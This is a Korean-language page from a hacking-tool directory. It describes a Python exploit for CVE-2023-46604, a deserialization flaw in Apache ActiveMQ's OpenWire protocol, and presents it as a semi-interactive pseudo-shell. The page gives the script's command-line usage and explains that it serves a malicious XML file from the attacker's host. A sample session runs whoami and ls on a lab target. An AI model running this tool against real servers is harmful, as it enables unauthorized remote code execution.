Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-46604-ActiveMQ-RCE-pseudoshell — 이 스크립트는 CVE-2023046604 (Apache ActiveMQ)를 활용하여 의사 셸을 생성합니다. 이 취약점은 OpenWire 프로토콜 내의 안전하지 않은 역직렬화로 인해 원격 코드 실행을 허용합니다. | Kitploit
도구/GitHubGitHub/duck-sec/cve-2023-46604-activemq-rce-pseudoshell
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubduck-sec/cve-2023-46604-activemq-rce-pseudoshell

CVE-2023-46604-ActiveMQ-RCE-pseudoshell

이 스크립트는 CVE-2023046604 (Apache ActiveMQ)를 활용하여 의사 셸을 생성합니다. 이 취약점은 OpenWire 프로토콜 내의 안전하지 않은 역직렬화로 인해 원격 코드 실행을 허용합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
1962년 전아직 검토되지 않음

CVE-2023-46604 RCE Pseudoshell

이 스크립트는 CVE-2023-46604(Apache ActiveMQ)를 활용하여 의사 셸(pseudo shell)을 생성합니다. 이 취약점은 OpenWire 프로토콜 내의 안전하지 않은 역직렬화로 인해 원격 코드 실행을 허용합니다.

설명

CVE-2023-46604는 Apache ActiveMQ의 OpenWire 프로토콜에 존재하는 역직렬화 취약점입니다. 이 결함은 공격자가 ActiveMQ가 실행 중인 서버에서 임의의 코드를 실행하도록 악용될 수 있습니다. 공격자는 악성 XML 파일을 제작할 수 있으며, 해당 파일의 명령어가 원격 서버에서 실행됩니다.

이 익스플로잇은 XML 문서 생성 과정을 자동화하고 추상화하며, 파일을 전달하기 위한 기본 서버를 제공하고 POST를 통해 대상 서버로부터 정보를 수신합니다. 이를 통해 리버스 셸을 호출하거나 바이너리를 배포할 필요 없이 지속적인 익스플로잇이 가능합니다.

전제 조건

익스플로잇 스크립트를 실행하기 전에 다음 사항을 확인하세요:

  • 시스템에 Python 3.x가 설치되어 있어야 합니다.
  • 취약한 ActiveMQ 서버에 네트워크로 접근할 수 있어야 합니다.
  • 취약한 서버에 대해 테스트할 권한이 있어야 합니다.

사용법

스크립트에 필요한 것:

  • ActiveMQ 서버 IP 또는 호스트명
  • 서브 IP (대상이 접근 가능한 시스템의 IP)

선택 사항:

  • ActiveMQ 서버 포트 - 기본값 61616
  • 서브 포트 (로컬 서버를 시작할 포트) - 기본값 8080
root@kitploit:~
usage: exploit.py [-h] -i IP [-p PORT] -si SRVIP [-sp SRVPORT]

optional arguments:
  -h, --help            show this help message and exit
  -i IP, --ip IP        ActiveMQ Server IP or Hostname
  -p PORT, --port PORT  ActiveMQ Server Port, defaults to 61616
  -si SRVIP, --srvip SRVIP
                        Serve IP
  -sp SRVPORT, --srvport SRVPORT
                        Serve port, defaults to 8080

예제

root@kitploit:~
$python3 exploit.py -i 10.129.230.87 -p 61616  -si 10.10.14.59 -sp 8080
#################################################################################
#  CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell      #
#  Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d              #
#################################################################################

[*] Target: 10.129.230.87:61616
[*] Serving XML at: http://10.10.14.59:8080/poc.xml
[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls-lah / for example.
[*] Type 'exit' to quit

#################################################################################
# Not yet connected, send a command to test connection to host.                 #
# Prompt will change to Apache ActiveMQ$ once at least one response is received #
# Please note this is a one-off connection check, re-run the script if you      #
# want to re-check the connection.                                              #
#################################################################################

[Target not responding!]$ whoami
activemq

Apache ActiveMQ$ ls -lah
total 164K
drwxr-xr-x  5 activemq activemq 4.0K Nov  7 12:50 .
drwxr-xr-x 11 activemq activemq 4.0K Nov  6 01:18 ..
-rwxr-xr-x  1 activemq activemq  21K Apr 20  2021 activemq
-rwxr-xr-x  1 activemq activemq 6.1K Apr 20  2021 activemq-diag
-rw-r--r--  1 activemq activemq  17K Apr 20  2021 activemq.jar
-rw-r--r--  1 activemq activemq 5.5K Apr 20  2021 env
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 linux-x86-32
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 linux-x86-64
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 macosx
-rw-r--r--  1 activemq activemq  82K Apr 20  2021 wrapper.jar

Apache ActiveMQ$ 

CVE-2023-46604-RCE.webm

크레딧

이 익스플로잇은 X1r0z의 Go 기반 원본 POC와 evkl1d의 Python POC를 기반으로 합니다.

면책 조항

이 코드는 교육 및 윤리적 보안 테스트 목적으로만 제공됩니다. 책임감 있게 사용해야 하며, 명시적 승인이 있는 환경에서만 사용해야 합니다. 무단 또는 악의적인 사용은 엄격히 금지됩니다. 이 코드를 사용함으로써 귀하는 해당 관할권에 적용되는 모든 관련 법률, 규정 및 윤리 기준을 준수하는 데 동의합니다. 제작자와 기여자는 이 코드의 오용 또는 무단 사용으로 인해 발생하는 모든 손해나 결과에 대해 책임을 지지 않습니다.

도구 다운로드